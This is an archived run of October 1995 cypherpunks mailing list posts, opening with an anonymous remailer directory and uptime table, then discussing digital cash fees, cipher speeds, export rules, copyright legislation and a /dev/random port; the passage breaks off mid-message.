$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ncognito"} = "<ncognito@gate.net> cpunk";
$remailer{"precip"} = "<mixmaster@mix.precipice.com> cpunk mix pgp hash latent cut ek reord";
$remailer{"ecafe"} = "<remail@ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
ideath   remailer@ideath.goldenbear.com   -.-.-.---.-   7:12:57  99.97%
hacktic  remailer@utopia.hacktic.nl       ************     9:03  99.95%
rmadillo remailer@armadillo.com           ++++++++++++    42:02  99.93%
ecafe    remail@ecafe.org                 **####+*##*#     1:37  99.93%
wmono    wmono@valhalla.phoenix.net       ************    13:17  99.91%
penet    anon@anon.penet.fi               ---------+++  2:58:18  99.74%
robo     robo@c2.org                           ###--*#    25:08  99.71%
spook    remailer@valhalla.phoenix.net    ******** *+*    16:41  99.69%
replay   remailer@replay.com              *****+* * **     6:34  99.52%
mix      mixmaster@remail.obscura.com     ---- -- ---   1:44:59  99.46%
c2       remail@c2.org                    +    +++-- *    53:17  98.82%
syrinx   syrinx@c2.org                    -  _ ____ .+ 55:55:41  97.38%
bsu-cs   nowhere@bsu-cs.bsu.edu           ***  #  #-+#    24:49  97.23%
flame    remailer@flame.alias.net           *     **+*    24:32  92.21%
vishnu   mixmaster@vishnu.alias.net         *     +***    10:39  90.65%
rahul    homer@rahul.net                  ***#*+ +#***     2:53  99.79%
alumni   hal@alumni.caltech.edu           +++#**-*+#       7:27  86.61%
portal   hfinney@shell.portal.com         **##*#-###       5:38  86.60%
ford     remailer@bi-node.zerberus.de     ____.--      38:06:00  86.33%
extropia remail@extropia.wimsey.com       -    . - -    5:24:35  63.83%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Tue, 31 Oct 1995 02:10:32 +0800
To: cypherpunks@toad.com
Subject: I-D ACTION:draft-eastlake-cybercash-v08-01.txt
Message-ID: <9510301638.AA17683@cantina.verity.com>
MIME-Version: 1.0
Content-Type: x-sun-attachment


----------
X-Sun-Data-Type: text
X-Sun-Data-Description: text
X-Sun-Data-Name: text
X-Sun-Charset: us-ascii
X-Sun-Content-Lines: 70


A Revised Internet-Draft is available from the on-line Internet-Drafts 
directories.                                                               

       Title     : CyberCash Credit Card Protocol Version 0.8              
       Author(s) : D. Eastlake, B. Boesch, S. Crocker, M. Yesil
       Filename  : draft-eastlake-cybercash-v08-01.txt
       Pages     : 55
       Date      : 10/27/1995

CyberCash is developing a general payments system for use over the 
Internet.  The structure and communications protocols of version 0.8 are 
described.  This version includes credit card payments only.  Additional 
capabilities are planned for future versions.                   

This document covers only the current CyberCash system which is one of 
the few operational systems in the rapidly evolving area of Internet 
payments.  CyberCash is committed to the further development of its system 
and to cooperation with the Internet Engineering Task Force and other 
standards organizations.                                                             

Internet-Drafts are available by anonymous FTP.  Login with the username
"anonymous" and a password of your e-mail address.  After logging in,
type "cd internet-drafts" and then
     "get draft-eastlake-cybercash-v08-01.txt".
A URL for the Internet-Draft is:
ftp://ds.internic.net/internet-drafts/draft-eastlake-cybercash-v08-01.txt
 
Internet-Drafts directories are located at:	
	                                                
     o  Africa                                   
        Address:  ftp.is.co.za (196.4.160.8)	
	                                                
     o  Europe                                   
        Address:  nic.nordu.net (192.36.148.17)	
        Address:  ftp.nis.garr.it (192.12.192.10)
	                                                
     o  Pacific Rim                              
        Address:  munnari.oz.au (128.250.1.21)	
	                                                
     o  US East Coast                            
        Address:  ds.internic.net (198.49.45.10)	
	                                                
     o  US West Coast                            
        Address:  ftp.isi.edu (128.9.0.32)  	
	                                                
Internet-Drafts are also available by mail.	
	                                                
Send a message to:  mailserv@ds.internic.net. In the body type: 
     "FILE /internet-drafts/draft-eastlake-cybercash-v08-01.txt".
							
NOTE: The mail server at ds.internic.net can return the document in
      MIME-encoded form by using the "mpack" utility.  To use this
      feature, insert the command "ENCODING mime" before the "FILE"
      command.  To decode the response(s), you will need "munpack" or
      a MIME-compliant mail reader.  Different MIME-compliant mail readers
      exhibit different behavior, especially when dealing with
      "multipart" MIME messages (i.e., documents which have been split
      up into multiple messages), so check your local documentation on
      how to manipulate these messages.
							
For questions, please mail to Internet-Drafts@cnri.reston.va.us.
							

Below is the data which will enable a MIME compliant mail reader 
implementation to automatically retrieve the ASCII version
of the Internet-Draft.

----- End Included Message -----

----------
X-Sun-Data-Type: Multipart
X-Sun-Charset: us-ascii
X-Sun-Content-Lines: 24

Content-Type: Multipart/Alternative; Boundary="OtherAccess"

--OtherAccess
Content-Type:  Message/External-body;
        access-type="mail-server";
        server="mailserv@ds.internic.net"

Content-Type: text/plain
Content-ID: <19951027135555.I-D@CNRI.Reston.VA.US>

ENCODING mime
FILE /internet-drafts/draft-eastlake-cybercash-v08-01.txt

--OtherAccess
Content-Type:   Message/External-body;
        name="draft-eastlake-cybercash-v08-01.txt";
        site="ds.internic.net";
        access-type="anon-ftp";
        directory="internet-drafts"

Content-Type: text/plain
Content-ID: <19951027135555.I-D@CNRI.Reston.VA.US>

--OtherAccess--
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Mon, 30 Oct 1995 06:53:53 +0800
To: Anonymous <nobody@REPLAY.COM>
Subject: Re: EE Times on IDEA
In-Reply-To: <199510281250.NAA14958@utopia.hacktic.nl>
Message-ID: <Pine.SOL.3.91.951030075604.12602E-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 28 Oct 1995, Anonymous wrote:
> Electronic Engineering Times
> Oct 23, 1995 p. 66
> 
> T.R MADHUSUDAN SASTRY,
> T. GANESAN, B.MADHUKAR
> AND N. SRINIVASA

> involved. The current implementation of Idea in ECB on Motorola's DSP
> 56166 running at 60 Mhz supports up to 625 kbits/second in full-duplex
> mode. That is 3.6 > times faster than using the DES algorithm. 

That last statement is rubbish.  For most CPU's I've seen, IDEA is either 
the same speed as DES or a bit slower.  There is no way that it is 3 
times faster that single DES.

		DES cbc		IDEA cbc
DSP 56166	 ???		  78 k/s	(625 kbits/sec)
486DX/50	 274 k/s	 177 k/s 	Solaris 2.4
Pentium 90	 703 k/s	 605 k/s	Linux
'old' R6000 box  295 k/s	 283 k/s
'old' Alpha box	1300 k/s	 690 k/s	(no 64 bit optimisations)
88100		 558 k/s	 526 k/s
PA-RISC		1072 k/s	 616 k/s	(very compiler dependant)
R4400 200mhz	1600 k/s	1290 k/s
Sparc 10	 695 k/s	 679 k/s

All speeds are in bytes/second.  The DES implementation is a 'standard'
fast DES (there are at least 2 DES packages on the net with this type of
speed) and the IDEA implementation is a 'standard' IDEA implementation
(similar speed to the reference versions) Both written in C.  I have
looked at how I could optimise IDEA but it does not lend it's self to vast
improvements the way DES does.  It may be possible to speed up IDEA by
%20 with good C compilers but that will still only be the speed of DES, I
do not think IDEA should be 'sold' as being faster than DES is software. 
It is not.  It has over twice the key length (128 vs 56) and that is it's
main benefit.

eric (having a rant at mis-information).
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Tue, 31 Oct 1995 02:08:18 +0800
To: cypherpunks@toad.com
Subject: Re: Pinkerton Risk Assessment & "Security 2000"
Message-ID: <199510301653.IAA24958@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


For even more, free information of this type, see the Counter-Terrorism page:

http://www.interlog.com/~vabiro/

An interesting collection of links and data...

Joel





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 31 Oct 1995 02:00:12 +0800
To: cypherpunks@toad.com
Subject: Re: Cuban Security Conference
Message-ID: <199510301723.JAA22047@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>		International Conference Center
>		     Pabexpo, Havana, Cuba
>			March 4-9, 1996
>	3rd Ibero-American Seminar on Protection against
>    Computer Viruses and Security of Information Technologies

I wonder if they'd be receptive to talks on private communications,
digicash, tax avoidance through digital technology, anarchy and
collapse of government power, etc. :-)   (Maybe they would;
Cuba's got to do something to get their economy out of the
post-Soviet-subsidy doldrums, and with the US preventing free
trade in sugar for them, maybe allowing capitalism will be their
only choice...)

For any Yankees interested in going, you generally need to be
a journalist of some sort to avoid the Trading With The Enemy Act
restrictions, but in cyberspace, that's easily arranged.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 31 Oct 1995 02:46:42 +0800
To: cypherpunks@toad.com
Subject: Keyed-MD5, ITAR, and HTTP-NG
Message-ID: <Pine.SOL.3.91.951030101221.319D-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



To summarise: the consensus is that using keyed-MD5 for authentication is 
ok under ITAR, but using it for confidentiality is out.

The reason I wanted to check is that I'm solidifying some of security 
paramaters for HTTP-NG so we can add them to the test implementation 
before the Dallas IETF. In addition to the slight problem of having half 
the development team on the other side of the Atlantic, I want to make at 
least a subset of the security schemes mandatory, and that means making 
the core stuff exportable.

At the moment, I'm thinking of making the mandatory schemes be Keyed MD5
for authentication, and weakened RC4 with an IV for confidentiality, with
the added stipulation being that the user must be informed when key
weakening is being used. I may swap RC4 for DES; they're both public 
domain, but RC4 is simpler. They're both shared key, but I don't make PK 
stuff mandatory. 

The other pre-defined schemes I'm planning on getting at least speced are 
3-DES and IDEA for confidetiality, SHA for hashing, and RSA & DH for 
key exchange, signatures, and authentication. Certificate format is 
currently X.509- PGP format will go in ASAP.


Simon

---
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: turner@TeleCheck.com
Date: Tue, 31 Oct 1995 00:32:16 +0800
To: blancw@accessone.com
Subject: Re: Pinkerton Risk Assessment & "Security 2000"
In-Reply-To: <9510300619.AA11035@pulm1.accessone.com>
Message-ID: <9510301612.AA15533@mercury.telecheck.com>
MIME-Version: 1.0
Content-Type: text/plain



blancw@accessone.com said:
> They advertise their services as:

> "... the risk assessment tool for the 21st century. If you or other 
> members of  your company travel internationally, the Global Risk 
> Network  on MSN. is an  invaluable service, keeping you informed of 
> worldwide events, political  turmoil, global sensitive spots, and 
> more! Now you have direct online access to  a wealth of exclusive 
> Pinkerton information, all via your computer. You can  even order 
> hard copy reports or have customized research performed by Pinkerton  
> Risk Assessment  experts, simply type in your request. Tailored for 
> the  individual traveler, as well as the corporate executive, our 
> risk services give  you several options to know the security 
> situation anywhere."
> 

The Deptartment of State has the same information available on Compu$erv
and possibly the internet.

Perhaps more importantly, this information is also available for free
on the Internet.

	http://dosfan.lib.uic.edu/
	gopher://dosfan.lib.uic.edu/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael J Gebis <gebis@ecn.purdue.edu>
Date: Mon, 30 Oct 1995 23:32:06 +0800
To: cypherpunks@toad.com
Subject: Re: Digicash will not fly (not)
Message-ID: <199510301515.KAA13367@purcell.ecn.purdue.edu>
MIME-Version: 1.0
Content-Type: text


> >While Chaum is a brilliant cryptographer, he is an incompetent businessman
> >He has demonstrated this in numerous ways.
> >The latest being "Cash" where the bank skims off 4% to 10% every time.
> >No one is going to use digicash under these kinds of terms and 
> >conditions.

> Doesn't just about everyone do precisely this when they pay sales tax?
> Every time a buck arrives or departs a hand one pays a tax yet the
> system (you and I)continues accepting these terms albeit painfully.

Theoretically, when I pay sales tax I get something in return (better
roads, nicer schools, improved NSA wiretaping, and other government
services.)  With digicash, you're paying for the use of the money
itself.

What sort of charges do Visa/Mastercard impose upon merchants?  I
thought it was 3%; if so, I would suspect that this is the level of
"off-the-top" skim that the market will sustain, and DigiCash should
probably use a similar rate.

-- 
Mike Gebis  gebis@ecn.purdue.edu  Corporate Operating Systems Still Suck




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ross Anderson <Ross.Anderson@cl.cam.ac.uk>
Date: Mon, 30 Oct 1995 18:41:09 +0800
To: cypherpunks@toad.com
Subject: Cuban Security Conference
Message-ID: <"swan.cl.cam.:050770:951030102939"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Mr Guevara of the Cuban embassy in London asked me to post
this announcement. Pass it on.



		        CALL FOR PAPERS


			INFORMATICS  96


		International Conference Center
		     Pabexpo, Havana, Cuba
			March 4-9, 1996


			   INCLUDING


	3rd Ibero-American Seminar on Protection against
    Computer Viruses and Security of Information Technologies

	*	Antivirus and protection software

	*	Security of information technologies, including
		-  diagnostic and security plans
		-  risk analysis, contingency and recovery plans
		-  technical aspects: identification and
		   authentication, cryptography, security models
		-  security organisation and management, security
		   policy, information sorting, training of users
		   and authentication
		-  security evaluation
		-  integration of security systems
		-  audit trail

	*	Experience

	Chairman of the organising committee: Jose Bidot Pelaez,
	    Chairman, National Committee for Data Protection
	

			      AND


	   1st International Seminar on Information Audit

	*	Information audit in business and financial
		management

	*	Information audit and current technology

	*	Tools for information audit

	*	Controls and risks in information systems

	*	Information audit for information systems

	Chairman of the organising committee: Fransisco Deiros,
	President, Information Audit Group, National Committee
	                    of Informatics


	Papers should be sent to the convention secretariat:

		Lic. Nancy Batard Najarro
		INFORMATICS 96 Executive Secretary
		Palacio de las Convenciones
		Apartado 16046, La Habana, Cuba

		Tel: +537 33-1466 / 20-6850
		Fax: +537 33-1657 / 33-1708

		Email: infor96@cenisi.cu








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Farber <farber@central.cis.upenn.edu>
Date: Tue, 31 Oct 1995 00:22:32 +0800
To: Michael J Gebis <cypherpunks@toad.com
Subject: Re: Digicash will not fly (not)
Message-ID: <199510301552.KAA24406@linc.cis.upenn.edu>
MIME-Version: 1.0
Content-Type: text/plain



>
>What sort of charges do Visa/Mastercard impose upon merchants?  I
>thought it was 3%; if so, I would suspect that this is the level of
>"off-the-top" skim that the market will sustain, and DigiCash should
>probably use a similar rate.
>
>-- 
>Mike Gebis  gebis@ecn.purdue.edu  Corporate Operating Systems Still Suck
>

Pricing is usally set so it includes the 3%. Cash prices are usually by
agreement the same as credit card. Will Digicash be an extra %age or will
the credit card agreements be changed Else it is 3% plus digicash for those
goods that offer the credit card option





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 31 Oct 1995 00:41:28 +0800
To: Michael J Gebis <cypherpunks@toad.com
Subject: Re: Digicash will not fly (not)
In-Reply-To: <199510301515.KAA13367@purcell.ecn.purdue.edu>
Message-ID: <9510301620.AA30950@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain


>What sort of charges do Visa/Mastercard impose upon merchants?  I
>thought it was 3%; if so, I would suspect that this is the level of
>"off-the-top" skim that the market will sustain, and DigiCash should
>probably use a similar rate.

Not quite 3% in that sense. The rate is varfiable 35 ce3nts plus 3%
being typical. The essential point is that this is insurance on the
deal. If the buyre does not pay their bill the money is still paid
to the merchant. If the goods are faulty the buyer may have recourse
against the card co (UK consumer credit act).

The charging structure of Digicash should be different however. Digicash
is like Mondex, it effectively gives the operator a signorage rights
which can be highly profitable in themselves. The cash in the Digicash 
scheme is earning interest for Mark Twain Bank.


Comment heard at the firm "It's time to make another backup of the 
Internet". :-) 


	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 31 Oct 1995 02:16:34 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: S. 1284 To Amend (C) Act
In-Reply-To: <199510300240.SAA07345@owens.ridgecrest.ca.us>
Message-ID: <199510301634.LAA10488@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tom Bell writes:
> [S. 1284 would]:  1) make[] transmission of copies a 
> type of publication (and thus potentially a means of infringing a 
> copyright); and 2) prohibit[] the importation, manufacture, or 
> distribution of any device the primary purpose of which is to 
> deactivate any technological protections that prevent or inhibit the 
> violation of copyrights.

M. F. (Pat) Sprague writes:
# What occurs to me is that PGP could be considered a "device" to obscure 
# contents of data therby preventing the determination of a copyright 
# violation.

Encryption (as opposed to decryption) doesn't defeat any mechanisms that 
stop someone from violating a copyright. It can make the _detection_ 
harder, but not the _commission_. So I don't think that should be a concern.
(As usual, IANAL.)

Building upon Tom Bell's and cjs' observations, I suppose it could be argued
that encryption can be employed as a means of copyright protection. Hence
some decryption programs might be outlawed as devices intended to
"deactivate" copyright-protecting technology. 

I can't think of any c'punks projects so far that try to pierce security 
schemes meant to shield materials from copyright violations. Since many 
cypherpunks aren't inclined to preserve copyrights, they lack a motive for
ensuring the integrity of copyright protection methods. Cypherpunks launch
attempts to crack security systems in order ultimately to improve them, not 
for the sake of breaking them. I expect the alt.2600 crowd would be more
directly affected by S. 1284.

As a matter of principle, though, I don't think we should be amicable to a
bill like S. 1284. It's a bit disturbing to see that it's cosponsored by
Sens. Patrick Leahy & Russ Feingold, who led the Senate opposition to the
Indecent Act. I find it hard to imagine that the bill will encounter any
significant legislative obstacles.

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 31 Oct 1995 01:04:15 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Important Digital Cash Question...
In-Reply-To: <Pine.SOL.3.91.951029212520.22281C-100000@chivalry>
Message-ID: <9510301637.AA21874@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>What's the right name to use for the Banker? I've been using "Nick", 
>after Nick Leeson; any other suggestions?

Thats Lessen, not Leeson. As in "I will lessen the amount of money you
have on deposit".

Actually you should have names beginning with I and A for Issuer and 
Aquirer.. But that messes up Alice. 

I think that the bankers name should be Ethel however.

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 31 Oct 1995 02:16:54 +0800
To: cypherpunks@toad.com
Subject: DOD_com
Message-ID: <199510301650.LAA13111@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-30-95. Wash Rag:


   "Pentagon Plans More Espionage. Business Fronts Abroad
   Would Expand Efforts Of a Unified Service."

      The Defense Department has merged its separate covert
      intelligence operations and plans to expand its
      espionage abroad, starting with establishment of phony
      businesses overseas as cover, and has formed the Defense
      HUMINT (Human Intelligence) Service, or DHS. Under the
      fiscal 1996 intelligence authorization bill, the DHS has
      been given a trial period of three years to carry on
      commercial activities "to provide cover security to
      intelligence collection activities undertaken abroad."
      The authority "to provide bona fide commercial cover,"
      was so that DHS's covert operatives could "withstand
      detailed investigation by hostile foreign intelligence
      services as well as domestic scrutiny."

      ... scandal of the Army's Yellow Fruit op ...

      CIA case officers are working with DHS on the cover
      companies abroad; cooperation is needed because in
      recent years military spies overseas inadvertently had
      set up relations with foreigners known to be double
      agents.

      Sen. Bob Kerrey called on CIA Director John M. Deutch to
      "develop his human collectors, planning 10 or more years
      in advance for their peak usefulness," a reference to
      placing them abroad under deep cover for use in future
      crises.


   DOD_com  (8 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 31 Oct 1995 02:11:03 +0800
To: cypherpunks@toad.com
Subject: Re: Important Digital Cash Question...
Message-ID: <v02120d06acbab250b4e9@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>I think that the bankers name should be Ethel however.
>
>        Phill

Wait, wait! I have another one. I call digital cash bankers "underwriters",
because they're basically underwriting digital certificates, like an
underwriter in the capital markets does.

So, we need a "U" name...

Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 31 Oct 1995 02:04:26 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Digicash will not fly (not)
In-Reply-To: <acb9bb9700021004f83d@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.951030121921.17834E-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain



One point worth noting is that the 5% cut used to be a typical fee for 
credit-card transactions. However, that cut only happened once per 
purchace, whereas digicash may incur this fee many more times. 

When I daydreamed about setting up a digicash issuer, I was thinking on 
the lines of a 2% fee for converting real money into digicash, then 
refunding any excess beyond cost of operations at the end of the year. 

Converting from real money to digicash is the most risky part of 
operations, so reserves should be proportional to this. Since my fantasy 
bank has a policy of not paying interest on digicash accounts, and 
keeping all assets in cash on (at worst) overnight deposit, this keeps 
things really safe. BTW, since I've got an aunt who lives in St. Brelade, 
the bank is in St Helier, Jersey, which has the great advantage of being 
one of the few Tax Havens to be able to get the Archers on FM.

Simon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 31 Oct 1995 06:48:34 +0800
To: Rich Salz <rsalz@osf.org>
Subject: Re:  Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <9510301954.AA07200@sulphur.osf.org>
Message-ID: <Pine.SOL.3.91.951030125419.429B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 30 Oct 1995, Rich Salz wrote:

> The licensed version of RC4, or the software that was posted anonymously?

Cop-out: That algorithm described in Applied Cryptography 2nd Edition 
under the label RC4.

> Where would you swap RC4 for DES?

The swap would take place in the list of schemes that must be supported 
by conforming applications. 

> I assume your added stipulation is a "should" not a "must" item.

Correct [strong should, but still should]

> How are you going to handle key management and naming?

The protocol's part of key management for OOB shared keys is taken care 
of by naming; session key exchange with PK is not yet fully defined, but 
will  look a lot like either SKIP or Photuris. 

Naming:
   Names are strings, of the format <domain>:<name>, where domain is the
name-space from which the names are taken. The following domains are
pre-defined: 

DN:	X.500 Distinguished name. The name portion contains the RFC1485 
	ascii encoding of the DN.

URN:	Uniform Resource Name. The name consists of a URN (whatever that 
	turns out to be).

PGP:	PGP format name. A PGP user name.


Simon
----
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Tue, 31 Oct 1995 02:42:53 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Cuban Security Conference
In-Reply-To: <199510301723.JAA22047@ix9.ix.netcom.com>
Message-ID: <Pine.3.89.9510301337.A30667-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 30 Oct 1995, Bill Stewart wrote:

> I wonder if they'd be receptive to talks on private communications,
> digicash, tax avoidance through digital technology, anarchy and
> collapse of government power, etc. :-)   (Maybe they would;

For that matter is civilian use of strong (or any other kind) crypto actually
legal in Cuba? Anyone know the policies? (duh, lemme guess...)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Black <black@sunflash.eng.usf.edu>
Date: Tue, 31 Oct 1995 03:40:01 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <Pine.SOL.3.91.951030101221.319D-100000@chivalry>
Message-ID: <Pine.SUN.3.91.951030134533.5999A-100000@sunflash.eng.usf.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

On Mon, 30 Oct 1995, Simon Spero wrote:

> The reason I wanted to check is that I'm solidifying some of security 
> paramaters for HTTP-NG so we can add them to the test implementation 
> before the Dallas IETF. In addition to the slight problem of having half 
> the development team on the other side of the Atlantic, I want to make at 
> least a subset of the security schemes mandatory, and that means making 
> the core stuff exportable.

  Since you deal with security issues maybe you can help me to learn 
about some issues with encryption.  I am talking with one of the 
administration people about putting PGP on the system for everyone to 
use, but there are issues for them (the admin) as they might be liable, 
even if they can't read the e-mail.  What other legal considerations 
should be evaluated?
  Is there any large organizations (like any other universities) that 
allow their students to use PGP, and have the system in place to make it 
easier for the students?  If it is offered here I might be the one to add 
to the mail program (pine) that is generally used to transparently use 
PGP, which is what I mean by having a system set up for the encryption. 
  Thanx for any help.  Take care and have fun.

James Black
black@suntan.eng.usf.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Mon, 30 Oct 1995 13:32:14 +0800
To: daw@quito.CS.Berkeley.EDU (David A Wagner)
Subject: Re: MD4-derived hash functions
In-Reply-To: <199510290028.UAA12628@book.hks.net>
Message-ID: <199510300353.AA55657@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>The conclusion to take away from this is simple: double encryption
>doesn't give you much extra security over single encryption.  Don't
>use double encryption.

That doesnt make sense. If one accepts that double encryption is securer than
single encryption, wether marginally or twice as secure, why not use it?

I would rather stand behind a steel door and a wooden door than a steel door
alone if anyone was shooting rounds at me.

Cheers,
Mark
mark@lochard.com.au




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Theodore Ts'o" <tytso@MIT.EDU>
Date: Tue, 31 Oct 1995 05:26:43 +0800
To: Mark Murray <mark@grondar.za>
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <199510301816.UAA14080@grumble.grondar.za>
Message-ID: <9510301856.AA22851@dcl.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Mon, 30 Oct 1995 20:16:24 +0200
   From: Mark Murray <mark@grondar.za>

   A colleague drew my attention to this, and I was so pleased with it that
   I ported it to FreeBSD.

Which version did you grab?  More recent versions of the driver use a
more efficient mixing algorithm suggested by Colin Plum.  There's also
the beginnings of support for user-mode deamons to add randomness into
the random pool by writing to /dev/random.  I also added support for
reading the instruction timing register for x86 platforms that support
it. 

   2) We felt that hooking all interrupts might be dangerous. IDE drives can
   interrupt at a heck of a rate, and so can some serial ports, and we felt
   that in these cases _not_ using the interrupt was a good idea. So I
   added an ioctl to allow the superuser to select his own set, appropriate
   to the hardware in use. It is nearly impossible to do this automatically.

Indeed; I can't emphasize this enough.  The clock interrupt, for
example, is a very bad irq to try to use.  In the Linux driver, only
device drivers who register their interrupt driver with the
SA_SAMPLE_RANDOM flag actually have the interrupt timings sampled for
the random number generator.

People have suggested using making it possible to select at run-time
